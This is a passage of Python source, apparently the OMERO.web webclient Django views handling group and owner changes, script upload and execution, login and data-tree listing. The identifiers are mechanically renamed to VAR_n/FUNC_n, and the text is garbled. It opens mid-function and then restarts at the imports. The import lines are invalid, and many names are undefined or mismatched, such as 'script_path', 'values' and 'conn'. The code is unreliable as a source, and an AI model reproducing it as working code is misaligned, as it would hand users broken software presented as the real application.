having count(im.id)>1)
"""
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_46.add(e[0].val)
VAR_220 = set([])
VAR_221 = False
if VAR_46:
VAR_73.map = {
"iids": rlist([rlong(x) for x in VAR_46]),
}
VAR_332 = ""
if VAR_45:
VAR_73.map["dids"] = rlist([rlong(x) for x in VAR_45])
VAR_332 = """
and (
dilink.parent.id not in (:dids)
or dilink.parent.id = null
)
"""
VAR_75 = (
"""
select distinct dilink.parent.id
from Image VAR_142
left outer join VAR_142.datasetLinks dilink
where VAR_142.id in (:VAR_153)
%s
and (select count(dilink2.child.id)
from DatasetImageLink dilink2
where dilink2.parent.id = dilink.parent.id
and dilink2.child.id not in (:VAR_153)) = 0
"""
% VAR_332
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
if e:
VAR_220.add(e[0].val)
else:
VAR_221 = True
VAR_222 = set([])
if VAR_45:
VAR_73.map = {"dids": rlist([rlong(x) for x in VAR_45])}
VAR_333 = ""
if VAR_44:
VAR_73.map["pids"] = rlist([rlong(x) for x in VAR_44])
VAR_333 = "and pdlink.parent.id not in (:pids)"
VAR_75 = (
"""
select distinct pdlink.parent.id
from ProjectDatasetLink pdlink
where pdlink.child.id in (:dids)
%s
and (select count(pdlink2.child.id)
from ProjectDatasetLink pdlink2
where pdlink2.parent.id = pdlink.parent.id
and pdlink2.child.id not in (:dids)) = 0
"""
% VAR_333
)
for e in VAR_74.projection(VAR_75, VAR_73, VAR_6.SERVICE_OPTS):
VAR_222.add(e[0].val)
VAR_223 = {
"remove": {
"project": list(VAR_44),
"dataset": list(VAR_45),
"screen": list(VAR_47),
"plate": list(VAR_48),
"image": list(VAR_46),
},
"childless": {
"project": list(VAR_222),
"dataset": list(VAR_220),
"orphaned": VAR_221,
},
}
return VAR_223
@require_POST
@login_required()
def FUNC_72(VAR_2, VAR_6=None, **VAR_7):
return FUNC_73(VAR_2, VAR_27="chgrp", VAR_6=conn, **VAR_7)
@require_POST
@login_required()
def FUNC_73(VAR_2, VAR_27, VAR_6=None, **VAR_7):
VAR_224 = {}
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate", "Fileset"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_224[VAR_215] = VAR_144
if VAR_27 == "chgrp":
VAR_334 = getIntOrDefault(VAR_2, "group_id", None)
elif VAR_27 == "chown":
VAR_334 = getIntOrDefault(VAR_2, "owner_id", None)
VAR_84 = VAR_6.submitDryRun(VAR_27, VAR_224, VAR_334)
VAR_198 = VAR_347(VAR_84)
return HttpResponse(VAR_198)
@login_required()
def FUNC_74(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chgrp"}, VAR_315=405)
VAR_20 = getIntOrDefault(VAR_2, "group_id", None)
if VAR_20 is None:
return JsonResponse({"Error": "chgrp: No VAR_20 specified"})
VAR_20 = VAR_241(VAR_20)
def FUNC_87(VAR_71):
for VAR_433 in ["Dataset", "Image", "Plate"]:
VAR_187 = VAR_71.POST.get(VAR_433, None)
if VAR_187 is not None:
for o in list(VAR_6.getObjects(VAR_433, VAR_187.split(","))):
return o.getDetails().owner.id.val
VAR_101 = VAR_6.getObject("ExperimenterGroup", VAR_20)
VAR_226 = VAR_2.POST.get("new_container_name", None)
VAR_227 = VAR_2.POST.get("new_container_type", None)
VAR_228 = None
VAR_229 = FUNC_87(VAR_2)
VAR_6.SERVICE_OPTS.setOmeroUser(VAR_229)
if (
VAR_226 is not None
and len(VAR_226) > 0
and VAR_227 is not None
):
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_20)
VAR_228 = VAR_6.createContainer(VAR_227, VAR_226)
if VAR_228 is None:
VAR_334 = VAR_2.POST.get("target_id", None)
VAR_228 = VAR_334 is not None and VAR_334.split("-")[1] or None
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_307 = VAR_2.POST.getlist("fileset")
if len(VAR_307) > 0:
if VAR_215 == "Dataset":
VAR_6.regroupFilesets(dsIds=VAR_144, VAR_307=fsIds)
else:
for VAR_365 in VAR_6.getObjects("Fileset", VAR_307):
VAR_144.extend([VAR_320.id for VAR_320 in VAR_365.copyImages()])
VAR_144 = list(set(VAR_144)) # remove duplicates
VAR_0.debug("chgrp to VAR_101:%s %s-%s" % (VAR_20, VAR_215, VAR_144))
VAR_84 = VAR_6.chgrpObjects(VAR_215, VAR_144, VAR_20, VAR_228)
VAR_198 = VAR_347(VAR_84)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chgrp",
"group": VAR_101.getName(),
"to_group_id": VAR_20,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change group",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
VAR_44 = VAR_2.POST.get("Project", [])
VAR_45 = VAR_2.POST.get("Dataset", [])
VAR_46 = VAR_2.POST.get("Image", [])
VAR_47 = VAR_2.POST.get("Screen", [])
VAR_48 = VAR_2.POST.get("Plate", [])
if VAR_44:
project_ids = [VAR_241(x) for x in VAR_44.split(",")]
if VAR_45:
dataset_ids = [VAR_241(x) for x in VAR_45.split(",")]
if VAR_46:
image_ids = [VAR_241(x) for x in VAR_46.split(",")]
if VAR_47:
screen_ids = [VAR_241(x) for x in VAR_47.split(",")]
if VAR_48:
plate_ids = [VAR_241(x) for x in VAR_48.split(",")]
VAR_230 = FUNC_71(
VAR_6,
VAR_44,
VAR_45,
VAR_46,
VAR_47,
VAR_48,
VAR_2.session.get("user_id"),
)
return JsonResponse({"update": VAR_230})
@login_required()
def FUNC_75(VAR_2, VAR_6=None, **VAR_7):
if not VAR_2.method == "POST":
return JsonResponse({"Error": "Need to POST to chown"}, VAR_315=405)
VAR_231 = getIntOrDefault(VAR_2, "owner_id", None)
if VAR_231 is None:
return JsonResponse({"Error": "chown: No VAR_231 specified"})
VAR_231 = int(VAR_231)
VAR_232 = VAR_6.getObject("Experimenter", VAR_231)
if VAR_232 is None:
return JsonResponse({"Error": "chown: Experimenter not found" % VAR_231})
VAR_225 = ["Project", "Dataset", "Image", "Screen", "Plate"]
VAR_233 = []
for VAR_215 in VAR_225:
VAR_154 = VAR_2.POST.get(VAR_215, None)
if VAR_154 is not None:
VAR_144 = [int(VAR_40) for VAR_40 in VAR_154.split(",")]
VAR_0.debug("chown to VAR_103:%s %s-%s" % (VAR_231, VAR_215, VAR_144))
VAR_84 = VAR_6.chownObjects(VAR_215, VAR_144, VAR_231)
VAR_198 = VAR_347(VAR_84)
VAR_233.append(VAR_198)
VAR_2.session["callback"][VAR_198] = {
"job_type": "chown",
"owner": VAR_232.getFullName(),
"to_owner_id": VAR_231,
"dtype": VAR_215,
"obj_ids": VAR_144,
"job_name": "Change owner",
"start_time": datetime.datetime.now(),
"status": "in progress",
}
VAR_2.session.modified = True
return JsonResponse({"jobIds": VAR_233})
@login_required(setGroupContext=True)
def FUNC_76(VAR_2, VAR_42, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_50 = {}
VAR_49 = VAR_241(VAR_42)
try:
VAR_73 = VAR_202.getParams(VAR_49)
except Exception as x:
if x.message and x.message.startswith("No processor available"):
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script")
return JsonResponse(VAR_174)
else:
raise
VAR_73 = VAR_202.getParams(VAR_49)
VAR_43 = VAR_73.name.replace("_", " ").replace(".py", "")
VAR_0.debug("Script: run with VAR_2.POST: %s" % VAR_2.POST)
VAR_234 = (
"file_annotation" in VAR_2.FILES and VAR_2.FILES["file_annotation"] or None
)
VAR_235 = None
if VAR_234 is not None and VAR_234 != "":
VAR_104 = BaseContainer(VAR_6)
VAR_235 = VAR_104.createFileAnnotations(VAR_234, [])
for VAR_312, VAR_322 in VAR_73.inputs.items():
VAR_335 = VAR_322.prototype
VAR_336 = VAR_335.__class__
if VAR_312 == "File_Annotation" and VAR_235 is not None:
VAR_50[VAR_312] = VAR_336(VAR_347(VAR_235))
continue
if VAR_336 == omero.rtypes.RBoolI:
VAR_375 = VAR_312 in VAR_2.POST
VAR_50[VAR_312] = VAR_336(VAR_375)
continue
if VAR_336.__name__ == "RMapI":
VAR_376 = "%s_key0" % VAR_312
VAR_377 = "%s_value0" % VAR_312
VAR_378 = 0
VAR_379 = {}
while VAR_376 in VAR_2.POST:
VAR_415 = VAR_347(VAR_2.POST[VAR_376])
VAR_416 = VAR_2.POST[VAR_377]
if len(VAR_415) > 0 and len(VAR_416) > 0:
VAR_379[VAR_347(VAR_415)] = VAR_416
VAR_378 += 1
VAR_376 = "%s_key%d" % (VAR_312, VAR_378)
VAR_377 = "%s_value%d" % (VAR_312, VAR_378)
if len(VAR_379) > 0:
VAR_50[VAR_312] = wrap(VAR_379)
continue
if VAR_312 in VAR_2.POST:
if VAR_336 == omero.rtypes.RListI:
VAR_417 = VAR_2.POST.getlist(VAR_312)
if len(VAR_417) == 0:
continue
if len(VAR_417) == 1: # process comma-separated list
if len(VAR_417[0]) == 0:
continue
VAR_417 = values[0].split(",")
VAR_418 = omero.rtypes.RStringI
VAR_419 = VAR_335.val # list
if len(VAR_419) > 0:
VAR_418 = VAR_419[0].__class__
if VAR_418 == int(1).__class__:
VAR_418 = omero.rtypes.rint
if VAR_418 == VAR_241(1).__class__:
VAR_418 = omero.rtypes.rlong
VAR_420 = []
for VAR_416 in VAR_417:
try:
VAR_38 = VAR_418(VAR_416.strip())
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_416))
continue
if isinstance(VAR_38, omero.model.IObject):
VAR_420.append(omero.rtypes.robject(VAR_38))
else:
VAR_420.append(VAR_38)
VAR_50[VAR_312] = omero.rtypes.rlist(VAR_420)
else:
VAR_375 = VAR_2.POST[VAR_312]
if len(VAR_375) == 0:
continue
try:
VAR_50[VAR_312] = VAR_336(VAR_375)
except Exception:
VAR_0.debug("Invalid entry for '%s' : %s" % (VAR_312, VAR_375))
continue
if "IDs" in VAR_50 and "Data_Type" in VAR_50:
VAR_337 = VAR_6.SERVICE_OPTS.getOmeroGroup()
VAR_6.SERVICE_OPTS.setOmeroGroup("-1")
try:
VAR_380 = VAR_6.getObject(
VAR_50["Data_Type"].val, unwrap(VAR_50["IDs"])[0]
)
VAR_381 = VAR_380.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_381)
except Exception:
VAR_0.debug(traceback.format_exc())
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
try:
VAR_0.debug("Running script %s with " "params %s" % (VAR_43, VAR_50))
except Exception:
pass
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43)
return JsonResponse(VAR_174)
@login_required(isAdmin=True)
@render_response()
def FUNC_77(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method != "POST":
return {"template": "webclient/VAR_203/upload_script.html"}
VAR_236 = VAR_2.POST.get("script_path")
VAR_237 = VAR_2.FILES["script_file"]
VAR_237.seek(0)
VAR_238 = VAR_237.read().decode("utf-8")
if not VAR_236.endswith("/"):
VAR_236 = script_path + "/"
VAR_236 = script_path + VAR_237.name
VAR_202 = VAR_6.getScriptService()
VAR_239 = VAR_202.getScriptID(VAR_236)
try:
if VAR_239 > 0:
VAR_173 = OriginalFileI(VAR_239, False)
VAR_202.editScript(VAR_173, VAR_238)
VAR_382 = "Script Replaced: %s" % VAR_237.name
else:
VAR_239 = VAR_202.uploadOfficialScript(VAR_236, VAR_238)
VAR_382 = "Script Uploaded: %s" % VAR_237.name
except omero.ValidationException as ex:
VAR_382 = VAR_347(ex)
return {"Message": VAR_382, "script_id": VAR_239}
@require_POST
@login_required()
def FUNC_78(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_202 = VAR_6.getScriptService()
VAR_49 = VAR_202.getScriptID("/omero/export_scripts/Batch_Image_Export.py")
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is not None:
VAR_337 = VAR_142.getDetails().group.id.val
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_337)
VAR_212 = [VAR_241(VAR_26)]
VAR_50 = {
"Data_Type": wrap("Image"),
"IDs": rlist([rlong(id) for id in VAR_212]),
}
VAR_50["Format"] = wrap("OME-TIFF")
VAR_174 = FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Create OME-TIFF")
return JsonResponse(VAR_174)
def FUNC_79(VAR_2, VAR_6, VAR_49, VAR_50, VAR_43="Script"):
VAR_2.session.modified = True
VAR_202 = VAR_6.getScriptService()
try:
VAR_84 = VAR_202.runScript(VAR_49, VAR_50, None, VAR_6.SERVICE_OPTS)
VAR_198 = VAR_347(VAR_84)
VAR_315 = "in progress"
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_315,
}
VAR_2.session.modified = True
except Exception as x:
VAR_198 = VAR_347(time()) # E.g. 1312803670.6076391
VAR_382 = x.message if hasattr(x, "message") else (x.args[0] if x.args else "")
if VAR_382 and VAR_382.startswith("No processor available"):
VAR_0.info(traceback.format_exc())
VAR_57 = "No Processor Available"
VAR_315 = "no processor available"
VAR_382 = "" # VAR_54 displays VAR_382 and VAR_346
else:
if isinstance(x, omero.ValidationException):
VAR_0.debug(x.message)
else:
VAR_0.error(traceback.format_exc())
VAR_57 = traceback.format_exc()
VAR_315 = "failed"
VAR_382 = x.message
VAR_2.session["callback"][VAR_198] = {
"job_type": "script",
"job_name": VAR_43,
"start_time": datetime.datetime.now(),
"status": VAR_315,
"Message": VAR_382,
"error": VAR_57,
}
return {"status": VAR_315, "error": VAR_57}
return {"jobId": VAR_198, "status": VAR_315}
@login_required()
@render_response()
def FUNC_80(VAR_2, VAR_26, VAR_6=None, **VAR_7):
VAR_240 = list(
VAR_6.getAnnotationLinks(
"Image", [VAR_26], VAR_90=omero.constants.namespaces.NSOMETIFF
)
)
VAR_172 = {}
if len(VAR_240) > 0:
VAR_240.sort(VAR_312=lambda x: x.getId(), VAR_352=True)
VAR_338 = VAR_240[0]
VAR_293 = VAR_338.creationEventDate()
VAR_34 = VAR_338.getChild().getId()
from omeroweb.webgateway.templatetags.common_filters import ago
VAR_31 = VAR_352("download_annotation", args=[VAR_34])
VAR_172 = {
"created": VAR_347(VAR_293),
"ago": ago(VAR_293),
"id": VAR_34,
"download": VAR_31,
}
return VAR_172 # will FUNC_81 returned as json by VAR_4
|
import .copy
import os
import .datetime
import Ice
from Ice import Exception as IceException
import logging
import .traceback
import json
import .re
import sys
import warnings
from past.builtins import unicode
from future.utils import bytes_to_native_str
from django.utils.html import escape
from django.utils.http import .is_safe_url
from time import .time
from omeroweb.version import .omeroweb_buildyear as build_year
from omeroweb.version import .omeroweb_version as omero_version
import .omero
import .omero.scripts
from omero.rtypes import wrap, unwrap, rlong, rlist
from omero.gateway.utils import .toBoolean
from django.conf import settings
from django.template import loader as template_loader
from django.http import (
Http404,
HttpResponse,
HttpResponseRedirect,
JsonResponse,
HttpResponseForbidden,
)
from django.http import HttpResponseServerError, HttpResponseBadRequest
from django.utils.http import .urlencode
from django.core.urlresolvers import .reverse, NoReverseMatch
from django.utils.encoding import smart_str
from django.views.decorators.cache import .never_cache
from django.views.decorators.http import .require_POST
from django.shortcuts import .render
from omeroweb.webclient.webclient_utils import _formatReport, _purgeCallback
from .forms import GlobalSearchForm, ContainerForm
from .forms import ShareForm
from .forms import ContainerNameForm, ContainerDescriptionForm
from .forms import CommentAnnotationForm, TagsAnnotationForm
from .forms import MetadataFilterForm, MetadataDetectorForm
from .forms import MetadataChannelForm, MetadataEnvironmentForm
from .forms import MetadataObjectiveForm, MetadataObjectiveSettingsForm
from .forms import MetadataStageLabelForm, MetadataLightSourceForm
from .forms import MetadataDichroicForm, MetadataMicroscopeForm
from .forms import FilesAnnotationForm, WellIndexForm, NewTagsAnnotationFormSet
from .controller.container import BaseContainer
from .controller.history import BaseCalendar
from .controller.search import BaseSearch
from .controller.share import BaseShare
from omeroweb.webadmin.forms import LoginForm
from omeroweb.webgateway import .views as webgateway_views
from omeroweb.webgateway.marshal import graphResponseMarshal
from omeroweb.webgateway.util import .get_longs as webgateway_get_longs
from omeroweb.feedback.views import .handlerInternalError
from omeroweb.webclient.decorators import login_required
from omeroweb.webclient.decorators import .render_response
from omeroweb.webclient.show import (
Show,
IncorrectMenuError,
paths_to_object,
paths_to_tag,
)
from omeroweb.decorators import (
ConnCleaningHttpResponse,
parse_url,
TableClosingHttpResponse,
)
from omeroweb.webgateway.util import .getIntOrDefault
from omero.model import (
AnnotationAnnotationLinkI,
DatasetI,
DatasetImageLinkI,
ExperimenterI,
ImageI,
OriginalFileI,
PlateI,
ProjectI,
ProjectDatasetLinkI,
ScreenI,
ScreenPlateLinkI,
TagAnnotationI,
)
from omero import ApiUsageException, ServerError, CmdError
from omeroweb.webgateway.views import LoginView
from . import .tree
try:
import .long
except ImportError:
VAR_241 = int
VAR_0 = logging.getLogger(__name__)
VAR_0.info("INIT '%s'" % os.getpid())
VAR_1 = settings.PAGE * 100
def FUNC_0(VAR_2, VAR_3, VAR_4):
VAR_51 = None
VAR_52 = VAR_2.GET.get(VAR_3, VAR_4)
if VAR_52 is not None:
VAR_51 = VAR_241(VAR_52)
return VAR_51
def FUNC_1(VAR_2, VAR_3):
VAR_51 = VAR_2.GET.getlist(VAR_3)
return [VAR_320 for VAR_320 in VAR_51 if VAR_320 != ""]
def FUNC_2(VAR_2, VAR_3):
warnings.warn(
"Deprecated. Use omeroweb.webgateway.util.get_longs()", DeprecationWarning
)
return webgateway_get_longs(VAR_2, VAR_3)
def FUNC_3(VAR_2, VAR_3, VAR_4):
return toBoolean(VAR_2.GET.get(VAR_3, VAR_4))
def FUNC_4(VAR_5):
if not is_safe_url(VAR_5, allowed_hosts=settings.REDIRECT_ALLOWED_HOSTS):
VAR_5 = VAR_352("webindex")
return VAR_5
@never_cache
@render_response()
def FUNC_5(VAR_2, VAR_6=None, **VAR_7):
VAR_53 = {"version": omero_version, "build_year": build_year}
if settings.INDEX_TEMPLATE is not None:
try:
template_loader.get_template(settings.INDEX_TEMPLATE)
VAR_53["template"] = settings.INDEX_TEMPLATE
except Exception:
VAR_53["template"] = "webclient/VAR_93.html"
VAR_53["error"] = traceback.format_exception(*sys.exc_info())[-1]
else:
VAR_53["template"] = "webclient/VAR_93.html"
return VAR_53
class CLASS_0(LoginView):
VAR_54 = "webclient/login.html"
VAR_55 = "OMERO.web"
def FUNC_81(self, VAR_2):
return self.handle_not_logged_in(VAR_2)
def FUNC_82(self, VAR_2, VAR_6, VAR_56):
if VAR_2.session.get("active_group"):
if (
VAR_2.session.get("active_group")
not in VAR_6.getEventContext().memberOfGroups
):
del VAR_2.session["active_group"]
if VAR_2.session.get("user_id"):
del VAR_2.session["user_id"]
if VAR_2.session.get("server_settings"):
del VAR_2.session["server_settings"]
if VAR_2.POST.get("noredirect"):
return HttpResponse("OK")
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is None or len(VAR_5) == 0:
try:
VAR_5 = parse_url(settings.LOGIN_REDIRECT)
except Exception:
VAR_5 = VAR_352("webindex")
else:
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_83(self, VAR_2, VAR_57=None, VAR_22=None):
if VAR_22 is None:
VAR_339 = VAR_2.GET.get("server", VAR_2.POST.get("server"))
if VAR_339 is not None:
VAR_115 = {"server": unicode(VAR_339)}
VAR_22 = LoginForm(VAR_115=initial)
else:
VAR_22 = LoginForm()
VAR_53 = {
"version": omero_version,
"build_year": build_year,
"error": VAR_57,
"form": VAR_22,
}
VAR_5 = VAR_2.GET.get("url")
if VAR_5 is not None and len(VAR_5) != 0:
VAR_53["url"] = urlencode({"url": VAR_5})
if hasattr(settings, "LOGIN_LOGO"):
VAR_53["LOGIN_LOGO"] = settings.LOGIN_LOGO
if settings.PUBLIC_ENABLED:
VAR_340 = VAR_352("webindex")
if settings.PUBLIC_URL_FILTER.search(VAR_340):
VAR_53["public_enabled"] = True
VAR_53["public_login_redirect"] = VAR_340
VAR_53["show_download_links"] = settings.SHOW_CLIENT_DOWNLOADS
if settings.SHOW_CLIENT_DOWNLOADS:
VAR_341 = re.match(
(
r"(?P<major>\VAR_364+)\."
r"(?P<minor>\VAR_364+)\."
r"(?P<patch>\VAR_364+\.?)?"
r"(?P<dev>(dev|a|b|rc)\VAR_364+)?.*"
),
omero_version,
)
VAR_342 = "^VAR_416%s\\.%s\\.[^-]+$" % (
VAR_341.group("major"),
VAR_341.group("minor"),
)
VAR_53["client_download_tag_re"] = VAR_342
VAR_53["client_download_repo"] = settings.CLIENT_DOWNLOAD_GITHUB_REPO
return render(VAR_2, self.template, VAR_53)
@login_required(ignore_login_fail=True)
def FUNC_6(VAR_2, VAR_6=None, **VAR_7):
return HttpResponse("OK")
@login_required()
def FUNC_7(VAR_2, VAR_6=None, VAR_5=None, **VAR_7):
FUNC_8(VAR_2)
if VAR_5 is None or VAR_5.startswith(VAR_352("change_active_group")):
VAR_5 = VAR_352("webindex")
VAR_5 = FUNC_4(VAR_5)
return HttpResponseRedirect(VAR_5)
def FUNC_8(VAR_2, VAR_8=None):
if VAR_8 is None:
VAR_8 = FUNC_0(VAR_2, "active_group", None)
if VAR_8 is None:
return
VAR_8 = int(VAR_8)
if (
"active_group" not in VAR_2.session
or VAR_8 != VAR_2.session["active_group"]
):
VAR_2.session.modified = True
VAR_2.session["active_group"] = VAR_8
def FUNC_9(VAR_2, VAR_9="All members"):
VAR_58 = (
VAR_2.session.get("server_settings")
.get("ui", {})
.get("menu", {})
.get("dropdown", {})
.get("everyone", {})
.get("label", VAR_9)
)
return {
"id": -1,
"omeName": VAR_58,
"firstName": VAR_58,
"lastName": "",
}
@login_required(login_redirect="webindex")
def FUNC_10(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "POST":
try:
try:
VAR_6.close()
except Exception:
VAR_0.error("Exception during FUNC_10.", exc_info=True)
finally:
VAR_2.session.flush()
return HttpResponseRedirect(VAR_352(settings.LOGIN_VIEW))
else:
VAR_53 = {"url": VAR_352("weblogout"), "submit": "Do you want to log out?"}
VAR_54 = "webgateway/base/includes/post_form.html"
return render(VAR_2, VAR_54, VAR_53)
def FUNC_11(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
VAR_2.session.modified = True
VAR_54 = VAR_7.get("template", None)
if VAR_54 is None:
if VAR_10 == "userdata":
VAR_54 = "webclient/VAR_158/containers.html"
elif VAR_10 == "usertags":
VAR_54 = "webclient/VAR_158/containers.html"
else:
VAR_54 = "webclient/%s/%s.html" % (VAR_10, menu)
VAR_59 = VAR_7.get("show", Show(VAR_6, VAR_2, VAR_10))
try:
VAR_242 = VAR_59.first_selected
except IncorrectMenuError as e:
return HttpResponseRedirect(e.uri)
VAR_60 = VAR_59.initially_open_owner
if VAR_2.GET.get("show", None) is not None and VAR_242 is None:
if (
settings.PUBLIC_ENABLED
and settings.PUBLIC_USER == VAR_6.getUser().getOmeName()
):
return HttpResponseRedirect("%s?VAR_5=%s" % (VAR_352("weblogin"), VAR_5))
if VAR_242 is not None:
VAR_20 = VAR_242.details.group.id.val
if VAR_6.isValidGroup(VAR_20):
FUNC_8(VAR_2, VAR_20)
else:
VAR_242 = None
VAR_61 = {}
VAR_62 = GlobalSearchForm(VAR_158=VAR_2.GET.copy())
if VAR_10 == "search":
if VAR_62.is_valid():
VAR_61["query"] = VAR_62.cleaned_data["search_query"]
VAR_5 = VAR_7.get("load_template_url", None)
if VAR_5 is None:
VAR_5 = VAR_352(viewname="load_template", args=[VAR_10])
VAR_8 = VAR_2.session.get("active_group") or VAR_6.getEventContext().groupId
VAR_63, VAR_64 = VAR_6.getObject("ExperimenterGroup", VAR_8).groupSummary()
VAR_65 = [u.id for u in VAR_63]
VAR_65.extend([u.id for u in VAR_64])
VAR_66 = VAR_2.GET.get("experimenter")
if VAR_60 is not None:
if VAR_2.session.get("user_id", None) != -1:
VAR_66 = VAR_60
try:
VAR_66 = VAR_241(VAR_66)
except Exception:
VAR_66 = None
if VAR_66 is not None:
if (
VAR_66
not in (
set(map(lambda x: x.id, VAR_63)) | set(map(lambda x: x.id, VAR_64))
)
and VAR_66 != -1
):
VAR_66 = None
if VAR_66 is None:
VAR_66 = VAR_2.session.get("user_id", None)
if VAR_66 is None or int(VAR_66) not in VAR_65:
if VAR_66 != -1: # All VAR_166 in VAR_101 is allowed
VAR_66 = VAR_6.getEventContext().userId
VAR_2.session["user_id"] = VAR_66
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_312=lambda x: x.getName().lower())
VAR_68 = VAR_67
VAR_69 = ContainerForm()
VAR_70 = {}
if VAR_10 == "search":
for g in VAR_68:
g.loadLeadersAndMembers()
for VAR_383 in g.leaders + g.colleagues:
VAR_70[VAR_383.id] = VAR_383
VAR_70 = list(VAR_70.values())
VAR_70.sort(VAR_312=lambda x: x.getLastName().lower())
VAR_53 = {
"menu": VAR_10,
"init": VAR_61,
"myGroups": VAR_67,
"new_container_form": VAR_69,
"global_search_form": VAR_62,
}
VAR_53["groups"] = VAR_68
VAR_53["myColleagues"] = VAR_70
VAR_53["active_group"] = VAR_6.getObject("ExperimenterGroup", VAR_241(VAR_8))
VAR_53["active_user"] = VAR_6.getObject("Experimenter", VAR_241(VAR_66))
VAR_53["initially_select"] = VAR_59.initially_select
VAR_53["initially_open"] = VAR_59.initially_open
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["current_url"] = VAR_5
VAR_53["page_size"] = settings.PAGE
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_53["current_admin_privileges"] = VAR_6.getCurrentAdminPrivileges()
VAR_53["leader_of_groups"] = VAR_6.getEventContext().leaderOfGroups
VAR_53["member_of_groups"] = VAR_6.getEventContext().memberOfGroups
VAR_53["search_default_user"] = settings.SEARCH_DEFAULT_USER
VAR_53["search_default_group"] = settings.SEARCH_DEFAULT_GROUP
return VAR_53
@login_required()
@render_response()
def FUNC_12(VAR_2, VAR_10, VAR_6=None, VAR_5=None, **VAR_7):
return FUNC_11(VAR_2=request, VAR_10=menu, VAR_6=conn, VAR_5=url, **VAR_7)
@login_required()
@render_response()
def FUNC_13(VAR_2, VAR_5=None, VAR_6=None, **VAR_7):
VAR_67 = list(VAR_6.getGroupsMemberOf())
VAR_67.sort(VAR_312=lambda x: x.getName().lower())
if VAR_6.isAdmin(): # Admin can see all VAR_68
VAR_243 = [
VAR_6.getAdminService().getSecurityRoles().userGroupId,
VAR_6.getAdminService().getSecurityRoles().guestGroupId,
]
VAR_68 = VAR_6.getObjects("ExperimenterGroup", opts={"load_experimenters": True})
VAR_68 = [g for g in VAR_68 if g.getId() not in VAR_243]
VAR_68.sort(VAR_312=lambda x: x.getName().lower())
else:
VAR_68 = VAR_67
for g in VAR_68:
g.loadLeadersAndMembers() # load VAR_63 / VAR_64
VAR_53 = {
"template": "webclient/base/includes/FUNC_13.html",
"current_url": VAR_5,
"groups": VAR_68,
"myGroups": VAR_67,
}
return VAR_53
@login_required()
def FUNC_14(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_68 = tree.marshal_groups(
VAR_6=conn, VAR_244=member_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"groups": VAR_68})
@login_required()
def FUNC_15(VAR_2, VAR_11, VAR_6=None, **VAR_7):
try:
VAR_11 = VAR_241(VAR_11)
except ValueError:
return HttpResponseBadRequest("Invalid VAR_343 id")
try:
if VAR_11 < 0:
VAR_343 = FUNC_9(VAR_2)
else:
VAR_343 = tree.marshal_experimenter(
VAR_6=conn, VAR_11=experimenter_id
)
if VAR_343 is None:
raise Http404("No Experimenter found with ID %s" % VAR_11)
return JsonResponse({"experimenter": VAR_343})
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
@login_required()
def FUNC_16(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_11 = FUNC_0(VAR_2, "id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if not VAR_6.isValidGroup(VAR_20):
return HttpResponseForbidden("Not a member of Group: %s" % VAR_20)
VAR_71 = dict()
try:
VAR_71["projects"] = tree.marshal_projects(
VAR_6=conn,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["datasets"] = tree.marshal_datasets(
VAR_6=conn,
VAR_247=True,
VAR_20=group_id,
VAR_11=experimenter_id,
VAR_87=page,
VAR_88=limit,
)
VAR_71["screens"] = tree.marshal_screens(
VAR_6=conn,
